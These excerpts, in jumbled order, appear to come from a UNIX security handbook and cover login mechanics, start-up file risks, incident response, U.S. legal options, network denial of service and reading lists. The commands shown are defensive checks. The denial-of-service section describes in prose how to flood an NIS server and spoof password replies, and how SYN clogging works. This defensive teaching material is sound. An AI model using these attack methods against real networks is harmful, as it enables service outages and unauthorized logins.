In normal operation, /etc/init then executes the shell script /etc/rc. Depending on which version of UNIX you are using, /etc/rc may execute a variety of other shell scripts whose names all begin with /etc/rc (common varieties include /etc/rc.network and /etc/rc.local) or which are located in the directory /etc/init.d or /etc/rc?.d. System V systems additionally use the file /etc/inittab to control what is done at various run levels. The /etc/rc script(s) set up UNIX as a multi-user system, performing a variety of functions, including:

●   Removing temporary files from the /tmp and/or /usr/tmp directories

●   Removing any lock files

●   Checking filesystem consistency and mounting additional filesystems

●   Turning on accounting and quota checking

●   Setting up the network

When /etc/rc finishes executing, /etc/init forks a new process for every enabled terminal on the system. On older systems, this program is called /etc/getty. On newer systems, including SVR4, it is called /usr/lib/saf/ttymon.

C.5.2 Logging In

The getty or ttymon program is responsible for configuring the user terminal and displaying the initial prompt. A copy of the program is run for each port that is monitored. Whenever the process dies, init starts another one to take its place. If the init process dies, UNIX halts or reboots (depending on the version of UNIX installed).

The getty or ttymon program displays the word login: (or a similar prompt) on its assigned terminal and waits for a username to be typed. When it gets a username, getty/ttymon exec's the program /bin/login, which asks for a password and validates it against the password stored in /etc/passwd. If the password does not match, the login program asks for a new username and password combination.

Some versions of UNIX can be set up to require an additional password if you're trying to log into the computer over a modem. See the reference page for your login program for details.

If you do not log in within a short period of time (usually 60 seconds), or if you make too many incorrect attempts, login exits and init starts up a new getty/ttymon program on the terminal. On some systems equipped with modems, this causes the telephone to hang up. Again, this strategy is designed to deter an unauthorized user from breaking into a UNIX computer by making the task more difficult: after trying a few passwords, a cracker attempting to break into a UNIX machine is forced to redial the telephone.

If the username and password match, the login program performs some accounting and initialization tasks, then changes its real and effective UIDs to be those of the username that has been supplied. login then exec's your shell program, usually /bin/csh or /bin/ksh. The process number of that shell is the same as that of the original getty. /etc/init receives a SIGCHLD signal when this process dies; /etc/init then starts a new getty or ttymon.

On Berkeley-derived systems, the file /etc/ttys or /etc/ttytab contains a line for each terminal that is to have a getty/ttymon process enabled. It also contains information on terminal type, if known, and an indication if the line is "secure." The root user cannot log into a terminal that is not secure; to become the superuser on one of these lines, you must first log in as yourself, then use the su command. Unless your terminal lines are all in protected areas, turning off "secure" on all lines is a good precaution.
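As a quick check - the file name and format differ from vendor to vendor, so treat this only as a sketch - you can list the terminal lines currently marked secure with:

# grep secure /etc/ttytab /etc/ttys 2>/dev/null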

C.5.3 Running the User's Shell

After you log in, UNIX will start up your shell. The shell will then read a series of start-up commands from a variety of different files, depending on which shell you are using and which flavor of UNIX you are running.

If your shell is /bin/sh (the Bourne shell) or /bin/ksh (the Korn shell), UNIX will execute all of the commands stored in a special file called .profile in your home directory. (On some systems, /bin/sh and /bin/ksh will also execute the commands stored in the /etc/profile or /usr/lib/profile file.)

If your shell is /bin/csh (the C shell), UNIX will execute all of the commands stored in the .cshrc file in your home directory. The C shell will then execute all of the commands stored in the .login file in your home directory. When you log out, the commands in the file .logout will be executed.

Because these files are automatically run for you when you log in, they can present a security problem: if an intruder were to modify the files, the end result would be the same as if the intruder were typing commands at your keyboard every time you logged in! Thus, these files should be protected so that an intruder cannot write to the files or replace them with other files. Chapter 5, The UNIX Filesystem, explains how to protect your files.
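One hedged example of such a check, assuming user home directories live under /home (adjust the path and the list of file names for your site), reports any of the common start-up files that are writable by everyone:

# find /home \( -name .profile -o -name .cshrc -o -name .login -o -name .logout \) \
    -perm -002 -exec ls -l {} \;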



Chapter 26
26. Computer Security and U.S. Law

Contents:
Legal Options After a Break-in
Criminal Prosecution
Civil Actions
Other Liability

You may have studied this book diligently and taken every reasonable step toward protecting your system, yet someone still abused it. Perhaps an ex-employee has broken in through an old account and has deleted some records. Perhaps someone from outside continues to try to break into your system despite warnings that they should stop. What recourse do you have through the courts? Furthermore, what are some of the particular dangers you may face from the legal system during the normal operation of your computer system? What happens if you are the target of legal action?

This chapter attempts to illuminate some of these issues. The material we present should be viewed as general advice, and not as legal opinion: for that, you should contact good legal counsel and have them advise you.

26.1 Legal Options After a Break-in

You have a variety of different recourses under the U.S. legal system for dealing with a break-in. A brief chapter such as this one cannot advise you on the subtle aspects of the law. Every situation is different. Furthermore, there are differences between state and Federal law, as well as different laws that apply to computer systems used for different purposes. Laws outside the U.S. vary considerably from jurisdiction to jurisdiction; we won't attempt to explain anything beyond the U.S. system.[1]

[1] An excellent discussion of legal issues in the U.S. can be found in Computer Crime: A Crimefighter's Handbook (O'Reilly & Associates, 1995), and we suggest you start there if you need more explanation than we provide in this chapter.

You should discuss your specific situation with a competent lawyer before pursuing any legal recourse. As there are difficulties and dangers associated with legal approaches, you should also be sure that you want to pursue this course of action before you go ahead.

In some cases, you may have no choice; you may be required to pursue legal means. For example:


●   If you want to file a claim against your insurance policy to receive money for damages resulting from a break-in, you may be required by your insurance company to pursue criminal or civil actions against the perpetrators.

●   If you are involved with classified data processing, you may be required by government regulations to report and investigate suspicious activity.

●   If you are aware of criminal activity and you do not report it (and especially if your computer is being used for that activity), you may be criminally liable as an accessory.

●   If your computer is being used for certain forms of unlawful or inappropriate activity and you do not take definitive action, you may be named as a defendant in a civil lawsuit seeking punitive damages for that activity.

●   If you are an executive and decide not to investigate and prosecute illegal activity, shareholders in your corporation can bring suit against you.

If you believe that your system is at risk, you should probably seek legal advice before a break-in actually occurs. By doing so, you will know ahead of time the course of action to take if an incident occurs.

To give you some starting points for discussion, this chapter provides an overview of the two primary legal approaches you can employ, and some of the features and difficulties that accompany each one.



Chapter 24
24. Discovering a Break-in

Contents:
Prelude
Discovering an Intruder
The Log Files: Discovering an Intruder's Tracks
Cleaning Up After the Intruder
An Example
Resuming Operation
Damage Control

This chapter describes what to do if you discover that someone has broken into your computer system: how to catch the intruder; how to figure out what, if any, damage has been done; and how to repair the damage, if necessary. We hope that you'll never have to use the techniques mentioned here.

24.1 Prelude

There are three major rules for handling security breaches.

24.1.1 Rule #1: DON'T PANIC

After a security breach, you are faced with many different choices. No matter what has happened, you will only make things worse if you act without thinking.

Before acting, you need to answer certain questions and keep the answers firmly in mind:

●   Did you really have a breach of security? Something that appears to be the action of an intruder might actually be the result of human error or software failure.

●   Was any damage really done? With many security breaches, the perpetrator gains unauthorized access but doesn't actually access privileged information or maliciously change the contents of files.

●   Is it important to obtain and protect evidence that might be used in an investigation?

●   Is it important to get the system back into normal operation as soon as possible?

●   Are you willing to take the chance that files have been altered or removed? If not, how can you tell for sure if changes have been made?

●   Does it matter if anyone within the organization hears about this incident? If somebody outside hears about it?

●   Can it happen again?

The answers to many of these questions may be contradictory; for example, protecting evidence and comparing files may not be possible if the goal is to get the system back into normal operation as soon as possible. You'll have to decide what's best for your own site.

24.1.2 Rule #2: DOCUMENT

Start a log, immediately. Take a notebook and write down everything you find, always noting the date and time. If you examine text files, print copies and then sign and date the hardcopy. If you have the necessary disk space, record your entire session with the script command, too. Having this information on hand to study later may save you considerable time and aggravation, especially if you need to restore or change files quickly to bring the system back to normal.
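For example, a session transcript can be captured with a command like the following (the file name is only illustrative); typing exit ends the recording:

# script /var/tmp/incident.log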

This chapter and the two chapters that follow present a set of guidelines for handling security breaches. In the following sections, we describe the mechanisms you can use to help you detect a break-in, and handle the question of what to do if you discover an intruder on your system. In Chapter 25, Denial of Service Attacks and Solutions, we'll describe denial of service attacks - ways in which attackers can make your system unusable without actually destroying any information. Finally, in Chapter 26, Computer Security and U.S. Law, we'll discuss legal approaches and issues you may need to consider after a security incident.

24.1.3 Rule #3: PLAN AHEAD

A key to effective response in an emergency is advance planning. When a security problem occurs, there are some standard steps to be taken. You should have these steps planned out in advance so there is little confusion or hesitation when an incident occurs.

In larger installations, you may want to practice your plans. For example, along with standard fire drills, you may want to have "virus drills" to practice coping with the threat of a virus, or "break-in drills." The following basic steps should be at the heart of your plan:

Step 1: Identify and understand the problem.

If you don't know what the problem is, you cannot take action against it. This rule does not mean that you need to have perfect understanding, but you should understand at least what form of problem you are dealing with. Cutting your computer's network connection won't help you if the problem is being caused by a revenge-bent employee with a terminal in his office.

Step 2: Contain or stop the damage.

If you've identified the problem, take immediate steps to halt or limit it. For instance, if you've identified the employee who is deleting system files, you'll want to turn off his account, and probably take disciplinary action as well. Both are steps to limit the damage to your data and system.

Step 3: Confirm your diagnosis and determine the damage.

After you've taken steps to contain the damage, confirm your diagnosis of the problem and determine the damage it caused. Are files still disappearing after the employee is discharged? You may never be 100% sure if two or more incidents are actually related. Furthermore, you may not be able to identify all of the damage immediately, if ever.

Step 4: Restore your system.

After you know the extent of the damage, you need to restore the system and data to a consistent state. This may involve reloading portions of the system from backups, or it may mean a simple restart of the system. Before you proceed, be certain that all of the programs you are going to use are "safe." The attacker may have replaced your restore program with a Trojan horse that deletes the files on both your hard disk and your backup tape!

Step 5: Deal with the cause.

If the problem occurred because of some weakness in your security or operational measures, you'll want to make changes and repairs after your system has been restored to a normal state. If the cause was a person making a mistake, you will probably want to educate him or her to avoid a second occurrence of the situation. If someone purposefully interfered with your operations, you may wish to involve law enforcement authorities.

Step 6: Perform related recovery.

If what occurred was covered by insurance, you may need to file claims. Rumor control, and perhaps even community relations, will be required at the end of the incident to explain what happened, what breaches occurred, and what measures were taken to resolve the situation. This step is especially important with a large user community, because unchecked rumors and fears can often damage your operations more than the problem itself.



Chapter 24
Discovering a Break-in

24.7 Damage Control

If you've already restored the system, what damage is there to control? Well, the aftermath, primarily. You need to follow through on any untoward consequences of the break-in. For instance, was proprietary information copied? If so, you need to notify your legal counsel and consider what to do.

You should determine which of the following concerns need to be addressed:

●   Do you need to file a formal report with law enforcement?

●   Do you need to file a formal report with a regulatory agency?

●   Do you need to file an insurance claim for downtime, use of hot spares, etc.?

●   Do you need to institute disciplinary or dismissal actions against one or more employees?

●   Do you need to file a report/request with your vendor?

●   Do you need to update your disaster recovery plan to account for changes or experiences in this instance?

●   Do you need to investigate and fix the software or configuration of any other systems under your control, or at any affiliated sites? That is, has this incident exposed a vulnerability elsewhere in your organization?

●   Do you need to update employee training to forestall any future incidents of this type?

●   Do you need to have your public relations office issue a formal report (inside or outside) about this incident?

The answers to the above questions will vary from situation to situation and incident to incident. We'll cover a few of them in more detail in succeeding chapters.



Chapter 24
Discovering a Break-in

24.6 Resuming Operation

The next step in handling a break-in is to restore the system to a working state. How quickly you must be back in operation, and what you intend to do about the break-in in the long term, will determine when and how you do this step.

In general you have a few options about how to proceed from this point:

●   Investigate until you have determined how the break-in happened, and when. Close up the holes and restore the system to the state it was in prior to the break-in.

●   Simply patch and repair whatever you think may have been related to the break-in. Then restore the system to operation with heightened monitoring.

●   Do a quick scan and cleanup, and put the system back into operation.

●   Call in law enforcement before you do anything else so they can start an investigation.

●   Do nothing whatsoever.

You want to get whatever assurance you can that you have restored anything damaged on the system, and fixed whatever it was that allowed the intruder in. Then, if you have been keeping good backups, you can restore the system to a working state.

Determining what failed and allowed an intruder in is complicated by the fact that there is usually little data in the logs to show what happened, and there are few things you can execute to reverse-engineer the break-in. Most break-ins seem to result from either a compromised user password (suspect this especially if you find that the intruders have installed a sniffer on your system) or a bug. If it is a bug, you may have difficulty determining what it is, especially if it is a new one that has not been widely exploited. If you suspect that it is a bug in some system software, you can try contacting your vendor to see if you can get some assistance there. In some cases it helps if you have a maintenance contract or are a major customer.

Another avenue you can explore is to contact the FIRST team appropriate for your site. Teams in FIRST often have some insight into current break-ins, largely because they see so many reports of them. Contacting a representative from one of the teams may result in some good advice for things to check before you put your system back into operation. However, many teams have rules of operation that prevent them from giving too much explicit information about active vulnerabilities until the appropriate vendors have announced a fix. Thus, you may not be able to get complete information from this source.


As a possible last resort, you might consult recent postings to the Usenet security groups, and to some of the current WWW sites and mailing lists. Often, current vulnerabilities are discussed in some detail in these locations. This is a mixed blessing: not only does it provide you with valuable information to protect (or restore) your site, but it also often provides details to hacker wannabes who are looking for ways to break into systems. We have also seen incorrect and even dangerous advice and analysis in some of these forums. Therefore, be very wary of what you read, and consider these sources as a last resort.



Chapter 25
Denial of Service Attacks and Solutions

25.3 Network Denial of Service Attacks

Networks are also vulnerable to denial of service attacks. In attacks of this kind, someone prevents legitimate users from using the network. The three common types of network denial of service attacks are service overloading, message flooding, and signal grounding. A fourth kind of attack is less common, but possible, and we describe it as clogging.

25.3.1 Service Overloading

Service overloading occurs when floods of network requests are made to a server daemon on a single computer. These requests can be initiated in a number of ways, many intentional. These floods can leave your system so busy servicing interrupt requests and network packets that it is unable to process regular tasks in a timely fashion. Many requests will be thrown away as there is no room to queue them. If it is a TCP-based service, they will be resent and will add to the load. Such attacks can also mask an attack on another machine by preventing audit records and remote login requests from being processed in a timely manner. They deny access to a particular service.

You can use a network monitor to reveal the type, and sometimes the origin, of overload attacks. If you have a list of machines and their low-level network addresses (i.e., Ethernet board-level addresses, not IP addresses), this may help you track the source of the problem if it is local to your network. Isolating your local subnet or network while finding the problem may also help. If you have logging on your firewall or router, you can quickly determine if the attack is coming from outside your network or inside[10] - you cannot depend on the IP address in the packet being correct.

[10] We are unaware of any firewall offering reliable protection against denial of service attacks of this kind.

Unfortunately, there is little that you, as an end user or administrator, can do to help make the protocols and daemons more robust in the face of such attacks. The best you can hope to do, at present, is to limit their effect. Partitioning your local network into subnets of only a few dozen machines each is one good approach. That way, if one subnet gets flooded as part of an attack or accident, not all of your machines are disabled.

Another action you can take is to prepare ahead of time for an attack. If you have the budget, buy a network monitor and have (protected) spare taps on your subnet so you can quickly hook up and monitor network traffic. Have printed lists of machine low-level and high-level addresses available so you can determine the source of the overload by observing packet flow.
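One way to build part of such a list ahead of time - a sketch only, as output formats and file locations vary by system - is to save and print the ARP table, which maps IP addresses to Ethernet addresses, while the network is known to be healthy:

# arp -a > address-list
# lpr address-list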

One partial help is available if the service being attacked is spawned from inetd with the nowait option. inetd, by default, has a "throttle" built in. If too many requests are received in too short a time for any of the services it monitors, it will start rejecting requests and syslog a message that the service is failing. This is done under the assumption that some bug has been triggered to cause all the traffic. This has the side effect of disabling your service as surely as if all the requests were accepted for processing. However, it may prevent the server itself from failing, and it results in an audit record showing when the problem occurred.

25.3.2 Message Flooding

Message flooding occurs when a user slows down the processing of a system on the network to prevent the system from processing its normal workload, by "flooding" the machine with network messages addressed to it. These may be requests for file service or login, or they may be simple echo-back requests. Whatever the form, the flood of messages overwhelms the target so it spends most of its resources responding to the messages. In extreme cases, this flood may cause the machine to crash with errors or lack of memory to buffer the incoming packets. This attack denies access to a network server.

A server that is being flooded may not be able to respond to network requests in a timely manner. An attacker can take advantage of this behavior by writing a program that answers network requests in the server's place. For example, an attacker could flood an NIS server and then issue his own replies for NIS requests - specifically, requests for passwords.

Suppose an attacker writes a program that literally bombards an NIS server machine with thousands of echo requests every second directed to the echo service. The attacker simultaneously attempts to log into a privileged account on a workstation. The workstation would request the NIS passwd information from the real server, which would be unable to respond quickly because of the flood. The attacker's machine could then respond, masquerading as the server, and supply bogus information, such as a record with no password. Under normal circumstances, the real server would notice this false packet and repudiate it. However, if the server machine is so loaded that it never receives the packet, or fails to receive it in a timely fashion, it cannot respond. The client workstation would believe the false response to be correct and process the attacker's login attempt with the false passwd entry.[11]

[11] Yes, we are leaving out some low-level details here. This form of masquerade is not as simple as we describe it, but it is possible.

A similar type of attack is a broadcast storm. By careful crafting of network messages, you can create a special message that instructs every computer receiving the message to reply or retransmit it. The result is that the network becomes saturated and unusable. Broadcast storms rarely result from intentional attack; more often, they result from failing hardware or from software that is under development, buggy, or improperly installed.

Broadcasting incorrectly formatted messages can also bring a network of machines to a grinding halt. If each machine is configured to log the reception of bad messages to disk or console, a flood of such broadcasts can leave the clients able to do nothing but process the errors and log them to disk or console. Again, preparing ahead with a monitor and breaking your network into subnets will help you prevent and deal with this kind of problem, although such planning will not eliminate the problem completely.

25.3.3 Signal Grounding

Physical methods can also be used to disable a network. Grounding the signal on a network cable, introducing some other signal, or removing an Ethernet terminator all have the effect of preventing clients from transmitting or receiving messages until the problem is fixed. This type of attack can be used not only to disable access to various machines that depend on servers to supply programs and disk resources, but also to mask break-in attempts on machines that report bad logins or other suspicious behavior to master machines across the network. For this reason, you should be suspicious of any network outage; it might be masking break-ins on individual machines.

Another method of protection, which also helps to reduce the threat of eavesdropping, is to protect the network cable physically from tapping. This protection reduces the threat of eavesdroppers and spoofers to well-defined points on the cable. It also helps reduce the risk of denial of service attacks from signal grounding. Chapter 12, Physical Security, discusses the physical protection of networks.

25.3.4 Clogging

The implementation of the TCP/IP protocols on many versions of UNIX allows them to be abused in various ways. One way to deny service is to use up the limit of partially open connections. TCP connections are established with a multi-way handshake that opens the connection and sets its parameters. If an attacker sends multiple requests to initiate a connection but then fails to follow through with the subsequent parts of the connection, the recipient will be left with multiple half-open connections that are occupying limited resources. Usually, these connection requests have forged source addresses that specify nonexistent or unreachable hosts that cannot be contacted. Thus, there is also no way to trace the connections back. They remain until they time out (or until they are reset by the intruder).

By analogy, consider what happens when your phone rings. You answer and say "hello," but no one responds. You wait a few seconds, then say "hello" again. You may do this one or two more times until you "time out" and hang up. However, during the time you are waiting for someone to answer your "hello" (and there may be no one there), the phone line is tied up and can process no other incoming calls.

There is little you can do in these situations. Modifications to the operating system sources could result in a tunable time-out, better logging of these problems, and a higher limit on the number of half-open connections allowed before new requests are rejected. However, these modifications are not simple to make.
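You can at least detect when this kind of clogging is in progress. A minimal sketch, assuming your netstat labels half-open connections SYN_RCVD (the state name varies; Linux, for example, prints SYN_RECV), counts them:

# netstat -an | grep SYN_RCVD | wc -l

A persistently large count suggests that someone is deliberately tying up your connection queue; dropping the wc shows the (possibly forged) source addresses involved.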

Firewalls generally do not address this problem either. The best you can achieve is to reject connection attempts from unknown hosts and networks at the firewall. The only other alternative is to rethink the protocols involved, and perhaps set much higher limits on the existing implementations. However, any finite limit can be exceeded. Networks based on virtual circuits (e.g., ATM) may provide a solution by bypassing the protocol problems completely. However, ATM and related technologies probably have their own set of vulnerabilities that we have yet to discover.



[Preface] Which <strong>UNIX</strong> System?<br />

Which UNIX System?

An unfortunate side effect of UNIX's popularity is that there are many different versions of UNIX; today, nearly every computer manufacturer has its own. Until recently, only UNIX operating systems sold by AT&T could be called "UNIX" because of licensing restrictions. Other manufacturers adopted names such as SunOS (Sun Microsystems), Solaris (also Sun Microsystems), Xenix (Microsoft), HP-UX (Hewlett-Packard), A/UX (Apple), Dynix (Sequent), OSF/1 (Open Software Foundation), Linux (Linus Torvalds), Ultrix (Digital Equipment Corporation), and AIX (IBM) - to name a few. Practically every supplier of a UNIX or UNIX-like operating system made its own changes to the operating system. Some of these changes were small, while others were significant. Some of these changes have dramatic security implications, and unfortunately, those implications are often not evident. Not every vendor considers the security implications of their changes before making them.

When we wrote the first edition of this book, there were two main families of <strong>UNIX</strong>: AT&T System V,<br />

and Berkeley's BSD. There were also some minor variations, including AT&T System III, Xenix, System<br />

8, and a few others. For many years, there was a sharp division between System V and BSD systems.<br />

System V was largely favored by industry and government because of its status as a well-supported,<br />

"official" version of <strong>UNIX</strong>. BSD, meanwhile, was largely favored by academic sites and developers<br />

because of its flexibility, scope, and additional features.<br />

As we describe in Chapter 1, the two main families of <strong>UNIX</strong> reunited several years ago in the form of<br />

System V Release 4 (usually referred to as V.4 or SVR4). Many of the better features of BSD 4.3 <strong>UNIX</strong><br />

were built into SVR4, resulting in a system that combines many of the best features of both systems (as<br />

well as a few of the worst, unfortunately). This now represents the dominant basis for most modern<br />

versions of <strong>UNIX</strong>, with the notable exception of the "free" versions of <strong>UNIX</strong>: BSD 4.4, FreeBSD, and<br />

Linux.<br />

This book covers <strong>UNIX</strong> security as it relates to common versions of <strong>UNIX</strong>. Specifically, we have<br />

attempted to present the material here as it pertains to SVR4 and then note differences with respect to<br />

other versions. Because of our long-standing experience with (and fondness for) the BSD-derived<br />

versions of <strong>UNIX</strong>, we will often refer to feature differences in terms of "BSD-derived features" and<br />

"AT&T-derived features," even though SVR4 may be thought of as having both. When you encounter<br />

these terms, think of "BSD-derived" as meaning BSD systems, Ultrix, SunOS 3.X and 4.X, Solaris 2.x,<br />

and SVR4. When you encounter the term "AT&T-derived," think of System V Release 3, Solaris 2.x,<br />

and, to some extent, AIX and HP-UX.<br />

Particular details in this book concerning specific UNIX commands, options, and side effects are based upon the authors' experience with AT&T System V Release 3.2 and 4.0, Berkeley UNIX Release 4.3 and 4.4, NEXTSTEP, Digital UNIX (the new name for OSF/1), SunOS 4.0 and 4.1, Solaris 2.3 and 2.4, and Ultrix 4.0. We've also had the benefit of our technical reviewers' long experience with other systems, such as AIX, HP-UX, and Linux. As these systems are representative of the majority of UNIX machines in use, it is likely that these descriptions will suffice for most machines to which the reader will have access.

NOTE: Throughout this book, we generally refer to System V Release 4 as SVR4. When<br />

we refer to SunOS without a version number, assume that we are referring to SunOS 4.1.x.<br />

When we refer to Solaris without a version number, assume that we are referring to Solaris<br />

2.x.<br />

Many <strong>UNIX</strong> vendors have modified the basic behavior of some of their system commands, and there are<br />

dozens upon dozens of <strong>UNIX</strong> vendors. As a result, we don't attempt to describe every specific feature<br />

offered in every version issued by every manufacturer-that would only make the book longer, as well as<br />

more difficult to read. It would also make this book inaccurate, as some vendors change their systems<br />

frequently. Furthermore, we are reluctant to describe special-case features on systems we have not been<br />

able to test thoroughly ourselves. Whether you're a system administrator or an ordinary user, it's vital that<br />

you read the reference pages of your own particular <strong>UNIX</strong> system to understand the differences between<br />

what is presented in this volume and the actual syntax of the commands that you're using. This is<br />

especially true in situations in which you're depending upon the specific output or behavior of a program<br />

to verify or enhance the security of your system.<br />

The Many Faces of "Free Unix"

One of the difficulties in writing a book such as this is that there are many, many versions of UNIX. All of them have differences: some minor, some significant. Our problem, as you shall see, is that even an apparently minor difference between two operating systems can lead to dramatic differences in overall security. Simply changing the protection settings on a single file can turn a secure operating system into an insecure one.

The Linux operating system makes things even more complicated. That's because Linux is an anarchic,<br />

moving target. There are many different versions of Linux. Some have minor differences, such as the<br />

installation of a patch or two. Others are drastically different, with different kernels, different driver<br />

software, and radically different security models.<br />

Linux is not the only free form of <strong>UNIX</strong>. After the release of Berkeley 4.3, the Berkeley Computer<br />

Systems Research Group (CSRG) (and a team of volunteers across the <strong>Internet</strong>) worked to develop a<br />

final release, BSD 4.4, which was devoid of all AT&T code. Somewhere along the line the project split<br />

into several factions, eventually producing three operating systems: BSD 4.4, NetBSD, and FreeBSD.<br />

Today there are several versions of each of these operating systems. There are also systems based on<br />

Mach and employing <strong>UNIX</strong>-like utilities from a number of sources.<br />

Today, the world of free UNIX is a maelstrom. It's as if commercial UNIX were being promoted and developed by several thousand different vendors. Thus, if you want to run Linux, or NetBSD, or FreeBSD, or any other such system securely, it is vitally important that you know exactly what software you are running on your computer. Merely reading your manual may not be enough! You may have to read the source code. You may have to verify that the source code that you are reading actually compiles to produce the binaries that you are running!

Also, please note that we cannot possibly describe (or even know) all the possible variations and<br />

implications, so don't assume that we have covered all the nuances of your particular system. When in<br />

doubt, check it out.<br />

NOTE: By writing this book, we hope to provide information that will help users and system administrators improve the security of their systems. We have tried to ensure the accuracy and completeness of everything within this book. However, as we noted previously, we can't be sure that we have covered everything, and we can't know about all the quirks and modifications made to every version and installation of UNIX-derived systems. There are so many versions, furthermore, that sometimes it is easy to get similar but different versions confused. Thus, we can't promise that your system security will never be compromised if you follow all our advice, but we can say with confidence that successful attacks will be less likely. We encourage readers to tell us of significant differences between their own experiences and the examples presented in this book; those differences may be noted in future editions.

"<strong>Sec</strong>ure" Versions of <strong>UNIX</strong><br />

Over time, several vendors have developed "secure" versions of <strong>UNIX</strong>, often known as "trusted <strong>UNIX</strong>."<br />

These systems embody mechanisms, enhancements, and restraints described in various government<br />

standards documents. These enhanced versions of <strong>UNIX</strong> are designed to work in Multi-Level <strong>Sec</strong>urity<br />

(MLS) and Compartmented-Mode Workstation (CMW) environments-where there are severe constraints<br />

designed to prevent the mixing of data and code with different security classifications, such as <strong>Sec</strong>ret and<br />

Top-<strong>Sec</strong>ret. Trusted Xenix and System V/MLS are two of the better-known instances of trusted <strong>UNIX</strong>.<br />

<strong>Sec</strong>ure <strong>UNIX</strong> systems generally have extra features added to them including access control lists, data<br />

labeling, and enhanced auditing. They also remove some traditional features of <strong>UNIX</strong> such as the<br />

superuser's special access privileges, and access to some device files. Despite these changes, the systems<br />

still bear a resemblance to standard <strong>UNIX</strong>.<br />

These systems are not in widespread use outside of selected government agencies. It seems doubtful to us that they will ever enjoy widespread acceptance, because many of the features only make sense within the context of a military security policy. On the other hand, some of these enhancements are useful in the commercial environment as well, and C2 security features are already common in many modern versions of UNIX.

Today trusted <strong>UNIX</strong> systems are often more difficult to use in a wide variety of environments, more<br />

difficult to port programs to, and more expensive to obtain and maintain. Thus, we haven't bothered to<br />

describe the quirks and special features of these systems in this book. If you have such a system, we<br />

recommend that you read the vendor documentation carefully and repeatedly. If these systems become<br />

more commonly accepted, we'll describe them in a future edition.<br />


D. Paper Sources<br />

Contents:<br />

<strong>UNIX</strong> <strong>Sec</strong>urity References<br />

<strong>Sec</strong>urity Periodicals<br />

Appendix D<br />

There have been a great many books, magazines and papers published on security in the last few years,<br />

reflecting the growing concern with the topic. Trying to keep up with even a subset of this information<br />

can be quite a chore, whether you wish to stay current as a researcher or as a practitioner. Here, we have<br />

collected information about a number of useful references that you can use as a starting point for more<br />

information, further depth, and additional assistance. We have tried to confine the list to accessible and<br />

especially valuable references that you will not have difficulty finding.[1] We've provided annotation<br />

where we think it will be helpful.<br />

[1] If you have some other generally accessible reference that you think is outstanding and<br />

that we omitted from this list, please let us know.<br />

In Appendix E we also list some online resources in which you can find other publications and<br />

discussions on security. In Appendix F, we give pointers to a number of professional organizations<br />

(including ACM, Usenix, and the IEEE Computer Society) that sponsor periodic conferences on security;<br />

you may wish to locate the proceedings of those conferences as an additional reference. We especially<br />

recommend the proceedings of the annual Usenix <strong>Sec</strong>urity Workshop: these are generally <strong>UNIX</strong>-related<br />

and more oriented toward practice than theory.<br />

D.1 <strong>UNIX</strong> <strong>Sec</strong>urity References<br />

These books focus on <strong>UNIX</strong> computer security.<br />

Curry, David A. <strong>UNIX</strong> System <strong>Sec</strong>urity: A Guide for Users and System Administrators. Reading, MA:<br />

Addison Wesley, 1992. Lots of sound advice from someone with real experience to back it up.<br />

Farrow, Rik. <strong>UNIX</strong> System <strong>Sec</strong>urity. Reading, MA: Addison Wesley, 1991. A reasonable overview of<br />

<strong>UNIX</strong> security, with emphasis on the DoD Orange Book and <strong>UNIX</strong> System V.<br />

Ferbrache, David, and Gavin Shearer. Unix Installation, <strong>Sec</strong>urity & Integrity. Englewood Cliffs, NJ:<br />

Prentice Hall, 1993. This is a comprehensive treatment of computer security issues in <strong>UNIX</strong>, although<br />

some areas are not treated in the same depth as others.<br />


Grampp, F. T., and R. H. Morris. "<strong>UNIX</strong> Operating System <strong>Sec</strong>urity," AT&T Bell Laboratories<br />

Technical Journal, October 1984. This is the original article on <strong>UNIX</strong> security and remains timely.<br />

Reid, Brian. "Reflections on Some Recent Widespread Computer Break-ins." Communications of the<br />

ACM, Volume 30, Number 2, February 1987. Some interesting comments on <strong>UNIX</strong> security based on<br />

some break-ins at various sites. Still timely.<br />

Wood, Patrick H., and Stephen G. Kochan. <strong>UNIX</strong> System <strong>Sec</strong>urity, Carmel, IN: Hayden Books, 1986. A<br />

good but very dated treatment of <strong>UNIX</strong> System V security prior to the incorporation of TCP/IP<br />

networking. This book is of mainly historical interest.<br />

D.1.1 Other Computer References<br />

The following books and articles are of general interest to all practitioners of computer security, whether they work with UNIX or another operating system.

D.1.2 Computer Crime and Law<br />

Arkin, S. S., B. A. Bohrer, D. L. Cuneo, J. P. Donohue, J. M. Kaplan, R. Kasanof, A. J. Levander, and S.<br />

Sherizen. Prevention and Prosecution of Computer and High Technology Crime. New York, NY:<br />

Matthew Bender Books, 1989. A book written by and for prosecuting attorneys and criminologists.<br />

BloomBecker, J. J. Buck. Introduction to Computer Crime. Santa Cruz CA: National Center for<br />

Computer Crime Data, 1988. (Order from NCCCD, 408-475-4457.) A collection of essays, news articles,<br />

and statistical data on computer crime in the 1980s.<br />

BloomBecker, J. J. Buck. Spectacular Computer Crimes. Homewood, IL: Dow Jones-Irwin, 1990. Lively<br />

accounts of some of the more famous computer-related crimes of the past two decades.<br />

BloomBecker, J.J. (as Becker, Jay). The Investigation of Computer Crime. Columbus, OH: Battelle Law<br />

and Justice Center, 1992.<br />

Communications of the ACM, Volume 34, Number 3, March 1991: the entire issue. This issue has a<br />

major feature discussing issues of computer publishing, Constitutional freedoms, and enforcement of the<br />

laws. This document is a good source for an introduction to the issues involved.<br />

Conly, Catherine H. Organizing for Computer Crime Investigation and Prosecution, Washington, DC:<br />

National Institutes of Justice, 1989. A publication intended for law-enforcement personnel.<br />

Cook, William J. <strong>Internet</strong> & Network Law 1995. A comprehensive volume which is updated regularly;<br />

the title may change to reflect the year of publication. For further information, contact the author at:<br />

Willian Brinks Olds Hofer Gilson and Lione<br />

Suite 3600,<br />

NBC Tower<br />

455 N Cityfront Plaza Dr.<br />

Chicago, IL 60611-4299<br />

Icove, David, Karl Seger, and William VonStorch, Computer Crime: A Crimefighter's Handbook, Sebastopol, CA: O'Reilly & Associates, 1995. A popular rewrite of an FBI training manual.

McEwen, J. Thomas. Dedicated Computer Crime Units. Washington, DC: National Institutes of Justice,<br />

1989. Another publication intended for law-enforcement personnel.<br />

Parker, Donn B. Computer Crime: Criminal Justice Resource Manual. Washington, DC:National<br />

Institutes of Justice, 1989. A comprehensive document for investigation and prosecution of<br />

computer-related crimes. (Order from +1-800-851-3420.)<br />

Power, Richard. Current and Future Danger: A CSI Primer on Computer Crime and Information<br />

Warfare. San Francisco, CA: Computer <strong>Sec</strong>urity Institute, 1995. An interesting and timely summary.<br />

Sieber, Ulrich, ed. International Review of Penal Law: Computer Crime and Other Crimes against<br />

Information Technology. Toulouse, France: 1992.<br />

D.1.3 Computer-Related Risks<br />

